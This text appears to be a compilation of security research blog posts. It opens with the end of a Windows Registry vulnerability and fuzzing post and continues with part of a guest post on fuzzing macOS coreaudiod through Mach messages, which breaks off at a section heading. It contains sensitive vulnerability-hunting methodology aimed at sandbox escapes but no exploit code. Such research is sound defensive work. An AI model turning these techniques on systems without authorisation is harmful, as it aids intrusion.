    In addition to the bug classes mentioned above, there are also many other types of issues that can occur in the registry. I certainly won't be able to name them all, but briefly, here are a few more primitives that come to mind when I think about registry vulnerabilities:

    • Low-severity security bugs: These include local DoS issues such as NULL pointer dereferences, infinite loops, direct KeBugCheckEx calls, as well as classic memory leaks, low-quality out-of-bounds reads, and others. The details of a number of such bugs can be found in the p0tools/WinRegLowSeverityBugs repository on GitHub.
    • Real, but unexploitable bugs: These are bugs that are present in the code, but cannot be exploited due to some mitigating factors. Examples include bugs in the CmpComputeComponentHashes and HvCheckBin internal functions.
    • Memory management bugs: These bugs are specifically related to the management of hive section views in the context of the Registry process. This especially applies to situations where the hive is loaded from a file on a removable drive, from a remote SMB share, or from a file on a local disk but with unusual semantics (e.g., a placeholder file created through the Cloud Filter API). Two examples of this vulnerability type are CVE-2024-43452 and CVE-2024-49114.
    • Unusual primitives: These are various non standard primitives that are simply too difficult to categorize, such as CVE-2024-26177, CVE-2024-26178, WinRegLowSeverityBugs #19, or WinRegLowSeverityBugs #20.

    Fuzzing considerations

    Due to the Windows Registry's strictly defined format (regf) and interface (around a dozen specific syscalls that operate on it), automated testing in the form of fuzzing is certainly possible. We are dealing with kernel code here, so it's not as simple as taking any library that parses a file format and connecting it to a standard fuzzer like AFL++, Honggfuzz, or Jackalope – registry fuzzing requires a bit more work. But, in its simplest form, it could consist of just a few trivial steps: finding an existing regf file, writing a bit-flipping mutator, writing a short harness that loads the hive using RegLoadAppKey, and then running those two programs in an infinite loop and waiting for the system to crash.

    It's hard to argue that this isn't some form of fuzzing, and in many cases, these kinds of methods are perfectly sufficient for finding plenty of serious vulnerabilities. After all, my entire months-long research project started with this fairly primitive fuzzing, which did more or less what I described above, with just a few additional improvements:

    • Fixing the hash in the regf header,
    • Performing a few simple operations on the hive, like enumerating subkeys and values,
    • Running on multiple machines at once,
    • Collecting code coverage information from the Windows kernel.

    Despite my best efforts, this type of fuzzing was only able to find one vulnerability (CVE-2022-35768), compared to over 50 that I later discovered manually by analyzing the Windows kernel code myself. This ratio doesn't speak well for fuzzing, and it stems from the fact that the registry isn't as simple a target for automated testing as it might seem. On the contrary, each individual element of such fuzzing is quite difficult and requires a large time investment if one wishes to do it effectively. In the following sections, I'll focus on each of these components (corpus, mutator, harness and bug detection), pointing out what I think could be improved in them compared to the most basic version discussed above.

    Initial corpus

    The first issue a potential researcher may encounter is gathering an initial corpus of input files. Sure, one can typically find dozens of regf files even on a clean Windows installation, but the problem is that they are all very simple and don't exhibit characteristics interesting from a fuzzing perspective. In particular:

    • All of these hives are generated by the same registry implementation, which means that their state is limited to the set of states produced by Windows, and not the wider set of states accepted by the hive loader.
    • The data structures within them are practically never even close to the limits imposed by the format itself, for example:
    • The maximum length of key and value names are 256 and 16,383 characters, but most names in standard hives are shorter than 30 characters.
    • The maximum nesting depth of the tree is 512 levels, but in most hives, the nesting doesn't exceed 10 levels.
    • The maximum number of keys and values in a hive is limited only by the maximum space of 2 GiB, but standard hives usually include at most a few subkeys and associated values – certainly not the quantities that could trigger any real bugs in the code.

    This means that gathering a good initial corpus of hives is very difficult, especially considering that there aren't many interesting regf hives available on the Internet, either. The other options are as follows: either simply accept the poor starting corpus and hope that these shortcomings will be made up for by a good mutator (see next section), especially if combined with coverage-based fuzzing, or try to generate a better one yourself by writing a generator based on one of the existing interfaces (the kernel registry implementation, the user-mode Offline Registry Library, or some other open-source library). As a last resort, you could also write your own regf file generator from scratch, where you would have full control over every aspect of the format and could introduce any variance at any level of abstraction. The last approach is certainly the most ambitious and time-consuming, but could potentially yield the best results.

    Mutator

    Overall, the issue with the mutator is very similar to the issue with the initial corpus. In both cases, the goal is to generate the most "interesting" regf files possible, according to some metric. However, in this case, we can no longer ignore the problem and hope for the best. If the mutator doesn't introduce any high-quality changes to the input file, nothing else will. There is no way around it – we have to figure out how to make our mutator test as much state of the registry implementation as possible.

    For simplicity, let's assume the simplest possible mutator that randomly selects N bits in the input data and flips them, and/or selects some M bytes and replaces them with other random values. Let's consider for a moment what logical types of changes this approach can introduce to the hive structure:

    • Enable or disable some flags, e.g., in the _CM_KEY_NODE.Flags field,
    • Change the value of a field indicating the length of an array or list, e.g., _CM_KEY_NODE.NameLength, _CM_KEY_VALUE.DataLength, or a 32-bit field indicating the size of a given cell,
    • Slightly change the name of a key or value, or the data in the backing cell of a value,
    • Corrupt a value sanitized during hive loading, causing the object to be removed from the hive during the self-healing process,
    • Change the value of some cell index, usually to an incorrect value,
    • Change/corrupt the binary representation of a security descriptor in some way.

    This may seem like a broad range of changes, but in fact, each of them is very local and uncoordinated with other modifications in the file. This can be compared to binary mutation of an XML file – sometimes we may corrupt/remove some critical tag or attribute, or even change some textually encoded number to another valid number – but in general, we should not expect any interesting structural changes to occur, such as changing the order of objects, adding/removing objects, duplicating objects, etc. Hives are very similar in nature. For example, it is possible to set the KEY_SYM_LINK flag in a key node by pure chance, but for this key to actually become a valid symlink, it is also necessary to remove all its current values, ​​and add a new value named "SymbolicLinkValue" of type REG_LINK containing a fully qualified registry path. With a mutator operating on single bits and bytes, the probability of this happening is effectively zero.

    In my opinion, a dedicated regf mutator would need to operate simultaneously on four levels of abstraction, in order to be able to create the conditions necessary for triggering most bugs:

    1. On the high-level structure of a hive, where only logical objects matter: keys, values, security descriptors, and the relationships between them. Mutations could involve adding, removing, copying, moving, and changing the internal properties of these three main object types. These mutations should generally conform to the regf format, but sometimes push the boundaries by testing edge cases like handling long names, a large number of subkeys or values, or a deeply nested tree.
    2. On the level of specific cell types, which can represent the same information in many different ways. This primarily refers to all kinds of lists that connect higher-level objects, particularly subkey lists (index leaves, fast leaves, hash leaves, root indexes), value lists, and linked lists of security descriptors. Where permitted by the format (or sometimes even in violation of the format), the internal representation of these lists could be changed, and its elements could be rearranged or duplicated.
    3. On the level of cell and bin layout: taking the entire set of interconnected cells as input, they could be rearranged in different orders, in bins of different sizes, sometimes interspersed with empty (or artificially allocated) cells or bins. This could be used to find vulnerabilities specifically related to hive memory management, and also to potentially facilitate triggering/reproducing hive memory corruption issues more reliably.
    4. On the level of bits and bytes: although this technique is not very effective on its own, it can complement more intelligent mutations. You never know what additional problems can be revealed through completely random changes that may not have been anticipated when implementing the previous ideas. The only caveat is to be careful with the number of those bit flips, as too many of them could negate the overall improvement achieved through higher-level mutations.

    As you can see, developing a good mutator requires some consideration of the hive at many levels, and would likely be a long and tedious process. The question also remains whether the time spent in this way would be worth it compared to the effects that can be achieved through manual code analysis. This is an open question, but as a fan of the registry, I would be thrilled to see an open-source project equivalent to fonttools for regf files, i.e., a library that allows "decompiling" hives into XML (or similar) and enables efficient operation on it. One can only dream... 🙂

    Finally, I would like to point out that regf files are not the only type of input for which a dedicated mutator could be created. As I've already mentioned before, there are also accompanying .LOG1/.LOG2 and .blf/.regtrans-ms files, responsible for the atomicity of individual registry operations and KTM transactions, respectively. Both types of files may not be as complex as the core hive files, but mutating them might still be worthwhile, especially since some bugs have been historically found in their handling. Additionally, other registry operations performed by the harness could also be treated as part of the input. This would resemble an architecture similar to Syzkaller, and storing registry call sequences as part of the corpus would require writing a special grammar-based mutator, or possibly adapting an existing one.

    Harness

    While having a good mutator for registry-related files is a great start, the vast majority of potential vulnerabilities do not manifest when loading a malformed hive, but only during further operations on said hive. These bugs are mainly related to some complex and unexpected state that has arisen in the registry, and triggering it usually requires a very specific sequence of system calls. Therefore, a well-constructed harness should support a broad range of registry operations in order to effectively test as many different internal states as possible. In particular, it should:

    • Perform all standard operations on keys (opening, creating, deleting, renaming, enumerating, setting properties, querying properties, setting notifications), values (setting, deleting, enumerating, querying data) and security descriptors (querying keys for security descriptors, setting new descriptors). For the best result, it would be preferable to randomize the values of their arguments (to a reasonable extent), as well as the order in which the operations are performed.
    • Support a  "deferred close" mechanism, i.e. instead of closing key handles immediately, maintain a certain cache of such handles to refer to them at a later point in time. In particular, the idea is to sometimes perform an operation on a key that has been deleted, renamed or had its hive unloaded, in order to trigger potential bugs related to object lifetime or the verification that a given key actually exists prior to performing any action on it.
    • Load input hives with different flags. The main point here is to load hives with and without the REG_APP_HIVE flag, as the differences in the treatment of app hives and regular hives are sometimes significant enough to warrant testing both scenarios. Randomizing the states of the other few flags that can take arbitrary values could also yield positive results.
    • Support the registry virtualization mechanism, which can consist of several components:
    • Periodically enabling and disabling virtualization for the current process using the SetTokenInformation(TokenVirtualizationEnabled) call,
    • Setting various virtualization flags for individual keys using the NtSetInformationKey(KeySetVirtualizationInformation) call,
    • Creating an additional key structure under the HKU\<SID>_Classes\VirtualStore tree to exercise the mechanism of key replication / merging state in "query" type operations (e.g. in enumeration of the values of a virtualized key).
    • Use transactions, both KTM and lightweight. In particular, it would be useful to mix non-transactional calls with transactional ones, as well as transactional calls within different transactions. This way, we would be able to the code paths responsible for making sure that no two transactions collide with each other, and that non-transactional operations always roll back the entire transactional state before making any changes to the registry. It would also be beneficial if some of these transactions were committed and some rolled back, to test as much of their implementation as possible.
    • Support layered keys. For many registry operations, the layered key implementation is completely different than the standard one, and almost always more complicated. However, adding differencing hive support to the fuzzer wouldn't be trivial, as it would require additional communication with VRegDriver to load/unload the hive. It would also require making some fundamental decisions: which hive(s) do we overlay our input hive on top of? Should we keep pairs of hives in the corpus and overlay them one on top of the other, in order to control the properties of all the keys on the layered key stack? Do we limit ourselves to a key stack of two elements, or create more complicated stacks consisting of three or more hives? These are all open questions to which I don't know the answer, but I am sure that implementing some form of layered key support would positively affect the number of vulnerabilities that could be found this way.
    • Potentially support multi-threading and execute the harness logic in multiple threads at once, allowing it to trigger potential race conditions. The downside of this idea is that unless we run the fuzzing in some special environment, it would probably be non-deterministic, making timing-related bugs difficult to reproduce.

    The final consideration for harness development is the prevalence of registry issues caused by improper error handling, particularly cell allocator out-of-memory errors. A potential harness feature could be to artificially trigger these circumstances, perhaps by aggressively filling almost all of the 2 GiB stable/volatile space, causing HvAllocateCell/HvReallocateCell functions to fail. However, this approach would waste significant disk space and memory, and substantially slow down fuzzing, so the net benefit is unclear. Alternative options include hooking the allocator functions to make them fail for a specific fraction of requests (e.g., using DTrace), or applying a runtime kernel modification to reduce the maximum hive space size from 2 GiB to some smaller value (e.g., 16 MiB). These ideas are purely theoretical and would require further testing.

    Bug detection

    Alongside a good initial corpus, mutator and harness, the fourth and final pillar of an effective fuzzing session is bug detection. After all, what good is it to generate an interesting sample and trigger a problem with a series of complicated calls, if we don't even notice the bug occurring? In typical user-mode fuzzing, bug detection is assisted by tools such as AddressSanitizer, which are integrated into the build process and add extra instrumentation to the binary to enable the detection of all invalid memory references taking place in the code. In the case of the Windows kernel, a similar role is played by the Special Pool, which isolates individual allocations on kernel pools to maximize the probability of a crash when an out-of-bounds access/use-after-free condition occurs. Additionally, it may also be beneficial to enable the Low Resources Simulation mechanism, which can cause some pool allocations to fail and thus potentially help in triggering bugs related to handling OOM conditions.

    The challenge with the registry lies in the fact that most bugs don't stem from memory corruption within the kernel pools. Typically, we're dealing with either hive-based memory corruption or its early stage—an inconsistent state within the registry that violates a crucial invariant. Reaching memory corruption in such a scenario necessitates additional steps from an attacker. For instance, consider a situation where the reference count of a security descriptor is decremented without removing a reference to it in a key node. To trigger a system bugcheck, one would need to remove all other references to that security descriptor (e.g., by deleting keys), overwrite it with different data (e.g., by setting a value), and then perform an operation on it or one of its adjacent descriptors that would lead to a system crash. Each extra step significantly decreases the likelihood of achieving the desired state. The fact that cells have their own allocator further hinders fuzzing, as there's no equivalent of the Special Pool available for it.

    Here are a few ideas for addressing the problem, some more realistic than others:

    • If we had a special library capable of breaking down regf files at various levels of abstraction, we could have the mutator create the input hive in a way that maximizes the chances of a crash if a bug occurs during a cell operation. For example, we could assign each key a separate security descriptor with refcount=1 (which should make triggering UAFs easier) and place each cell at the end of a separate bin, followed by another, empty bin. This behavior would be very similar to how the Special Pool works, but at the bin and cell level.
    • Again, if we had a good regf file parser, we could open the hive saved on disk after each iteration of the harness and verify its internal consistency. This would allow us to catch inconsistent hive states early, even if they didn't lead to memory corruption or a system crash in a specific case.
    • Possibly, instead of implementing the hive parsing and verification mechanism from scratch, one could try to reuse an existing implementation. In particular, an interesting idea would be to use the self-healing property of the registry. Thanks to this, after each iteration, we could theoretically load the hive once again for a short period of time, unload it, and then compare the "before" and "after" representations to see if the loader fixed any parts of the hive during the loading process. We could potentially also try to use the user-mode offreg.dll library for this purpose, which seems to share much of the hive loading code with the Windows kernel, and which would likely be more efficient to call.
    • As part of testing a given hive in a harness, we could periodically fill the entire hive (or at least all its existing bins) with random data to increase the probability of detecting UAFs by overwriting freed objects with incorrect data.

    Finally, as an optional step, one could consider implementing checks at the harness level to identify logical issues in registry behavior. For example, after each individual operation, the harness could verify whether the process security token and handle access rights actually allowed it – thereby checking if the kernel correctly performed security access checks. Another idea would be to examine whether all operations within a transaction have been applied correctly during the commit phase. As we can see, there are many potential ideas, but when evaluating their potential usefulness, it is important to focus on the registry behaviors and API contracts that are most relevant to system security.

    Conclusion

    This concludes our exploration of the Windows Registry's role in system security and effective vulnerability discovery techniques. In the next post, we'll stay on the topic of security, but we'll shift our focus from discovering bugs to developing specific techniques for exploiting them. We'll use case studies of some experimental exploits I wrote during my research to demonstrate their practical security implications. See you then!

    • ✇Project Zero
    • Breaking the Sound Barrier Part I: Fuzzing CoreAudio with Mach Messages Google Project Zero
      Guest post by Dillon Franke, Senior Security Engineer, 20% time on Project Zero Every second, highly-privileged MacOS system daemons accept and process hundreds of IPC messages. In some cases, these message handlers accept data from sandboxed or unprivileged processes. In this blog post, I’ll explore using Mach IPC messages as an attack vector to find and exploit sandbox escapes. I’ll detail how I used a custom fuzzing harness, dynamic instrumentation, and plenty of debugging/static analys
       

    Breaking the Sound Barrier Part I: Fuzzing CoreAudio with Mach Messages

    9 de Maio de 2025, 14:38

    Guest post by Dillon Franke, Senior Security Engineer, 20% time on Project Zero

    Every second, highly-privileged MacOS system daemons accept and process hundreds of IPC messages. In some cases, these message handlers accept data from sandboxed or unprivileged processes.

    In this blog post, I’ll explore using Mach IPC messages as an attack vector to find and exploit sandbox escapes. I’ll detail how I used a custom fuzzing harness, dynamic instrumentation, and plenty of debugging/static analysis to identify a high-risk type confusion vulnerability in the coreaudiod system daemon. Along the way, I’ll discuss some of the difficulties and tradeoffs I encountered.

    Transparently, this was my first venture into the world of MacOS security research and building a custom fuzzing harness. I hope this post serves as a guide to those who wish to embark on similar research endeavors.

    I am open-sourcing the fuzzing harness I built, as well as several tools I wrote that were useful to me throughout this project. All of this can be found here: https://github.com/googleprojectzero/p0tools/tree/master/CoreAudioFuzz

    The Approach: Knowledge-Driven Fuzzing

    For this research project, I adopted a hybrid approach that combined fuzzing and manual reverse engineering, which I refer to as knowledge-driven fuzzing. This method, learned from my friend Ned Williamson, balances automation with targeted investigation. Fuzzing provided the means to quickly test a wide range of inputs and identify areas where the system’s behavior deviated from expectations. However, when the fuzzer’s code coverage plateaued or specific hurdles arose, manual analysis came into play, forcing me to dive deeper into the target’s inner workings.

    Knowledge-driven fuzzing offers two key advantages. First, the research process never stagnates, as the goal of improving the code coverage of the fuzzer is always present. Second, achieving this goal requires a deep understanding of the code you are fuzzing. By the time you begin triaging legitimate, security-relevant crashes, the reverse engineering process will have given you extensive knowledge of the codebase, enabling analysis of crashes from an informed perspective.

    The cycle I followed during this research is as follows:

    1. Identify an attack vector
    2. Choose a target
    3. Create a fuzzing harness
    4. Fuzz and produce crashes
    5. Analyze crashes and code coverage      
    6. Iterate on the fuzzing harness
    7. Repeat steps 4-6  

    Identify an Attack Vector

    Standard browser sandboxing limits code execution by restricting direct operating system access. Consequently, exploiting a browser vulnerability typically requires the use of a separate “sandbox escape” vulnerability.

    Since interprocess communication (IPC) mechanisms allow two processes to communicate with each other, they can naturally serve as a bridge from a sandboxed process to an unrestricted one. This makes them a prime attack vector for sandbox escapes, as shown below.

    A diagram illustrating SANDBOX ESCAPE and PRIVILEGE ESCALATION. The sandbox escape shows a Web Browser Process within a SANDBOX RESTRICTED communicating with a Message Handler via MACH IPC. The privilege escalation shows an Unprivileged Process communicating with a Message Handler Highly Privileged Process via MACH IPC.

    I chose Mach messages, the lowest level IPC component in the MacOS operating system, as the attack vector of focus for this research. I chose them mostly due to my desire to understand MacOS IPC mechanisms at their most core level, as well as the track record of historical security issues with Mach messages.

    Previous Work and Background

    Leveraging Mach messages in exploit chains is far from a novel idea. For example, Ian Beer identified a core design issue in 2016 with the XNU kernel related to the handling of task_t Mach ports, which allowed for exploitation via Mach messages. Another post showed how an in-the-wild exploit chain utilized Mach messages in 2019 for heap grooming techniques. I also drew much inspiration from Ret2 Systems’ blog post about leveraging Mach message handlers to find and weaponize a Safari sandbox escape.

    I won’t spend too much time detailing the ins and outs of how Mach messages work, (that is better left to a more comprehensive post on the subject) but here’s a brief overview of Mach IPC for this blog post:

    1. Mach messages are stored within kernel-managed message queues, represented by a Mach port
    2. A process can fetch a message from a given port if it holds the receive right for that port
    3. A process can send a message to a given port if it holds a send right to that port

    MacOS applications can register a service with the bootstrap server, a special mach port which all processes have a send right to by default. This allows other processes to send a Mach message to the bootstrap server inquiring about a specific service, and the bootstrap server can respond with a send right to that service’s Mach port. MacOS system daemons register Mach services via launchd. You can view their .plist files within the /System/Library/LaunchAgents and /System/Library/LaunchDaemons directories to get an idea of the services registered. For example, the .plist file below highlights a Mach service registered for the Address Book application on MacOS using the identifier com.apple.AddressBook.AssistantService.

    <?xml version="1.0" encoding="UTF-8"?>

    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

    <plist version="1.0">

    <dict>

            <key>POSIXSpawnType</key>

            <string>Adaptive</string>

            <key>Label</key>

            <string>com.apple.AddressBook.AssistantService</string>

            <key>MachServices</key>

            <dict>

                    <key>com.apple.AddressBook.AssistantService</key>

                    <true/>

            </dict>

            <key>ProgramArguments</key>

            <array>

                    <string>/System/Library/Frameworks/AddressBook.framework/Versions/A/Helpers/ABAssistantService.app/Contents/MacOS/ABAssistantService</string>

            </array>

    </dict>

    </plist>

    Choose a Target

    After deciding I wanted to research Mach services, the next question was which service to target. In order for a sandboxed process to send Mach messages to a service, it has to be explicitly allowed. If the process is using Apple’s App Sandbox feature, this is done within a .sb file, written using the TinyScheme format. The snippet below shows an excerpt of the sandbox file for a WebKit GPU Process. The allow mach-lookup directive is used to allow a sandboxed process to lookup and send Mach messages to a service.

    # File: /System/Volumes/Preboot/Cryptexes/Incoming/OS/System/Library/Frameworks/WebKit.framework/Versions/A/Resources/com.apple.WebKit.GPUProcess.sb

    (with-filter (system-attribute apple-internal)

        (allow mach-lookup

            (global-name "com.apple.analyticsd")

            (global-name "com.apple.diagnosticd")))

    (allow mach-lookup

           (global-name "com.apple.audio.audiohald")

           (global-name "com.apple.CARenderServer")

           (global-name "com.apple.fonts")

           (global-name "com.apple.PowerManagement.control")

           (global-name "com.apple.trustd.agent")

           (global-name "com.apple.logd.events"))

    This helped me narrow my focus significantly from all MacOS processes, to processes with a sandbox-accessible Mach service:

    A Venn diagram illustrating process types on macOS. The outermost, largest oval represents All MacOS Processes. Within it, a smaller oval represents Processes with a Mach Service. The innermost, smallest oval represents Processes with a Sandbox Allowed Mach Service, indicating a subset of processes with increasing restrictions and specific Mach service permissions.

    In addition to inspecting the sandbox profiles, I used Jonathan Levin’s sbtool utility to test which Mach services could be interacted with for a given process. The tool (which was a bit outdated, but I was able to get it to compile) uses the builtin sandbox_exec function under the hood to provide a nice list of accessible Mach service identifiers:

     ./sbtool 2813 mach

    com.apple.logd

    com.apple.xpc.smd

    com.apple.remoted

    com.apple.metadata.mds

    com.apple.coreduetd

    com.apple.apsd

    com.apple.coreservices.launchservicesd

    com.apple.bsd.dirhelper

    com.apple.logind

    com.apple.revision

    …Truncated…

    Ultimately, I chose to take a look at the coreaudiod daemon, and specifically the com.apple.audio.audiohald service for the following reasons:

    • It is a complex process
    • It allows Mach communications from several impactful applications, including the Safari GPU process
    • The Mach service had a large number of message handlers
    • The service seemed to allow control and and modification of audio hardware, which would likely require elevated privileges
    • The coreaudiod binary and the CoreAudio Framework it heavily uses were both closed source, which would provide a unique reverse engineering challenge

    Create a Fuzzing Harness

    Once I chose an attack vector and target, the next step was to create a fuzzing harness capable of sending input through the attack vector (a Mach message) at a proper location within the target.

    A coverage-guided fuzzer is a powerful weapon, but only if its energy is focused in the right place—like a magnifying glass concentrating sunlight to start a fire. Without proper focus, the energy dissipates, achieving little impact.

    Determining an Entry Point

    Ideally, a fuzzer should perfectly replicate the environment and capabilities available to a potential attacker. However, this isn't always practical. Trade-offs often need to be made, such as accepting a higher rate of false positives for increased performance, simplified instrumentation, or ease of development. Therefore, identifying the “right place” to fuzz is highly dependent on the specific target and research goals.

    Option 1: Interprocess Fuzzing

    All Mach messages are sent and received using the mach_msg API, as shown below. Therefore, I thought the most intuitive way to fuzz coreaudiod‘s Mach message handlers would be to write a fuzzing harness that called the mach_msg API and allow my fuzzer to modify the message contents to produce crashes. The approach would look something like this:

    A diagram showing inter-process communication. A "SENDING PROCESS" calls mach_msg API, sending a message via "Mach IPC" to a "Kernel-Managed Message Queue". This queue then forwards the message via "Mach IPC" to a "Mach Message Handler" in the "RECEIVING PROCESS".

    However, this approach had a large downside: since we were sending IPC messages, the fuzzing harness would be in a different process space than the target. This meant code coverage information would need to be shared across a process boundary, which is not supported by most fuzzing tools. Additionally, kernel message queue processing adds a significant performance overhead.

    Option 2: Direct Harness

    While requiring a bit more work up front, another option was to write a fuzzing harness that directly loaded and called the Mach message handlers of interest. This would have the massive advantage of putting our fuzzer and instrumentation in the same process as the message handlers, allowing us to more easily obtain code coverage.

    A diagram illustrating a SINGLE PROCESS communication. It shows Load Library & Call Message Handler communicating via a Fuzzing Harness to a Mach Message Handler all within the same process.

    One notable downside of this fuzzing approach is that it assumes all fuzzer-generated inputs pass the kernel’s Mach message validation layer, which in a real system occurs before a message handler gets called. As we’ll see later, this is not always the case. In my view, however, the pros of fuzzing in the same process space (speed and easy code coverage collection) outweighed the cons of a potential increase in false positives.

    The approach would be as follows:

    1. Identify a suitable function for processing incoming mach messages
    2. Write a fuzzing harness to load the message handling code from coreaudiod 
    3. Use a fuzzer to generate inputs and call the fuzzing harness
    4. Profit, hopefully

    Finding the Mach Messager Handler

    To start, I searched for the Mach service identifier, com.apple.audioaudiohald, but found no references to it within the coreaudiod binary. Next, I checked the libraries it loaded using otool. Logically, the CoreAudio framework seemed like a good candidate for housing the code for our message handler.

    $ otool -L /usr/sbin/coreaudiod

    /usr/sbin/coreaudiod:

            /System/Library/PrivateFrameworks/caulk.framework/Versions/A/caulk (compatibility version 1.0.0, current version 1.0.0)

            /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio (compatibility version 1.0.0, current version 1.0.0)

            /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation (compatibility version 150.0.0, current version 2602.0.255)

            /usr/lib/libAudioStatistics.dylib (compatibility version 1.0.0, current version 1.0.0, weak)

            /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 2602.0.255)

            /usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current version 228.0.0)

            /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 1700.255.5)

            /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1345.120.2)

    However, I was surprised to find that the path returned by otool did not exist!

    $ stat /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio

    stat: /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio: stat: No such file or directory

    The Dyld Shared Cache

    A bit of research showed me that as of MacOS Big Sur, most framework binaries are not stored on disk but within the dyld shared cache, a mechanism for pre-linking libraries to allow applications to run faster. Thankfully, IDA Pro, Binary Ninja, and Ghidra support parsing the dyld shared cache to obtain the libraries stored within. I also used this helpful tool to successfully extract libraries for additional analysis.

    Once I had the CoreAudio Framework within IDA, I quickly found a call to bootstrap_check_in with the service identifier passed as an argument, proving the CoreAudio framework binary was responsible for setting up the Mach service I wanted to fuzz. However, it still wasn’t obvious where the message handling code was happening, despite quite a bit of reverse engineering.

    A screenshot of disassembled code. A function macOS_PlatformBehaviors::get_system_port is shown. A call to _bootstrap_check_in is highlighted, along with the string com.apple.audio.audiohald being passed as a service name.

    It turns out this is due to the use of the Mach Interface Generator, (MIG) an Interface Definition Language from Apple that makes it easier to write RPC clients and servers by abstracting away much of the Mach layer. When compiled, MIG message handling code gets bundled into a structure called a subsystem. One can easily grep for these subsystems to find their offsets:

    $ nm -m ./System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio | grep -i subsystem

                     (undefined) external _CACentralStateDumpRegisterSubsystem (from AudioToolboxCore)

    00007ff840470138 (__DATA_CONST,__const) non-external _HALC_HALB_MIGClient_subsystem

    00007ff840470270 (__DATA_CONST,__const) non-external _HALS_HALB_MIGServer_subsystem

    Next, I searched in IDA for cross-references to the _HALS_HALB_MIGServer_subsystem symbol, which identified the MIG server function that parsed incoming Mach messages! The routine is shown below, with the first parameter (the rdi register) being the incoming Mach message and the second (the rsi register) being the message to return to the client. The MIG server function extracted the msgh_id parameter from the Mach message and used that to index into the MIG subsystem. Then, the necessary function handler was called.

    A flowchart of disassembled code within HALB_MIGServer_server. Annotations highlight Incoming msg rdi and steps to Get msg ID and Get subsystem offset. This offset is then used to Index into function handler based on msg ID" leading to a Call function block.

    I further confirmed this by setting an LLDB breakpoint on the coreaudiod process (after disabling SIP) for the _HALB_MIGServer_server function. Then, I adjusted the volume on my system, and the breakpoint was hit:

    A debugger lldb window showing a breakpoint hit in CoreAudio_HALB_MIGServer_server. The process is stopped at the beginning of this function, with the instruction push rbp highlighted. The thread information indicates the queue is com.apple.audio.device.BuiltInSpeakerDevice.event

    In this example, tracing the message handler called from the MIG subsystem showed the _XObject_HasProperty function was called based on the Mach message’s msgh_id.

    A debugger lldb window showing two states of a stopped process. The first state shows the process stopped at a call rcx instruction within CoreAudio_HALB_MIGServer_server. After a step into si command, the second state shows the process stopped at the beginning of CoreAudio__XObject_HasProperty, as indicated by the red arrow and highlighted function name.

    Depending on the msgh_id, a few dozen message handlers were accessible from the MIG subsystem. They are easily identifiable by the convenient __X prefix to their function names added by MIG.

    A list of function names, likely from a software library or framework, related to object and system context management. Each function name is prefixed with an f icon and highlighted in red, possibly indicating they are of interest for analysis or have been patched. Examples include __XObject_PropertyListener, __XIOContext_PauseIO, __XSystem_CreateIOContext, and __XObject_HasProperty.

    The _HALB_MIGServer_server function struck a great balance between getting close to low-level message handling code while still resembling the inputs that a call to mach_msg would take. I decided this was the place to inject fuzz input into.

    Creating a Basic Fuzzing Harness

    After identifying the function I wanted to fuzz, the next step was to write a program to read a file and deliver the file’s contents as input to the target function. This might have been as easy as linking the CoreAudio library with my fuzzing harness and calling the _HALB_MIGServer_server function, but unfortunately the function was not exported.

    Instead, I borrowed some logic from Ivan Fratric and his TinyInst tool (we’ll be talking about it a lot more later) which returns a provided symbol’s address from a library. The code parses the structure of Mach-O binaries, specifically their headers and load commands, to locate and extract symbol information. This made it possible to resolve and call the target function in my fuzzing harness, even when it wasn’t exported.

    So, the high level function of my harness was as follows:

    1. Load the CoreAudio Library
    2. Get a function pointer for the target function from the CoreAudio Library
    3. Read an input from a file
    4. Call the target function with the input

    The full implementation of my fuzzing harness can be found here. An example of invoking the harness to send a message from an input file is shown below:

    $ ./harness -f corpora/basic/1 -v

    *******NEW MESSAGE*******

    Message ID: 1010000 (XSystem_Open)

    ------ MACH MSG HEADER ------

    msg_bits: 2319532353

    msg_size: 56

    msg_remote_port: 1094795585

    msg_local_port: 1094795585

    msg_voucher_port: 1094795585

    msg_id: 1010000

    ------ MACH MSG BODY (32 bytes) ------

    0x01 0x00 0x00 0x00 0x03 0x30 0x00 0x00 0x41 0x41 0x41 0x41 0x41 0x41 0x11 0x00 0x41 0x41 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

     

    ------ MACH MSG TRAILER ------

    msg_trailer_type: 0

    msg_trailer_size: 32

    msg_seqno: 0

    msg_sender: 0

    ------ MACH MSG TRAILER BODY (32 bytes) ------

    0xf5 0x01 0x00 0x00 0xf5 0x01 0x00 0x00 0x14 0x00 0x00 0x00 0xf5 0x01 0x00 0x00 0x14 0x00 0x00 0x00 0x7e 0x02 0x00 0x00 0xa3 0x86 0x01 0x00 0x4f 0x06 0x00 0x00 

    Processing function result: 1

    *******RETURN MESSAGE*******

    ------ MACH MSG HEADER ------

    msg_bits: 1

    msg_size: 36

    msg_remote_port: 1094795585

    msg_local_port: 0

    msg_voucher_port: 0

    msg_id: 1010100

    ------ MACH MSG BODY (12 bytes) ------

    0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00

    Harvesting Legitimate Mach Messages

    I now had a way to deliver data directly into the MIG subsystem (_HALB_MIGServer_server) I wanted to fuzz. However, I had no idea the specific message size, options, or data the handler was expecting. While a coverage-guided fuzzer will begin to uncover the proper message format over time, it is advantageous to obtain a seed corpus of legitimate inputs when first beginning to fuzz to improve efficiency.

    To do this, I used LLDB to set a breakpoint on the MIG subsystem and dump the first argument (containing the incoming Mach message). Then, I played around with the operating system to cause Mach messages to be sent to coreaudiod. The Audio MIDI Setup MacOS application ended up being great for this, as it allows one to create, edit, and delete audio devices.

    A screenshot of macOS Audio Devices settings. A red arrow points to the "+" button in the bottom left, with a dropdown menu open showing "Create Aggregate Device" highlighted, indicating the action being taken.

    Fuzz and Produce Crashes

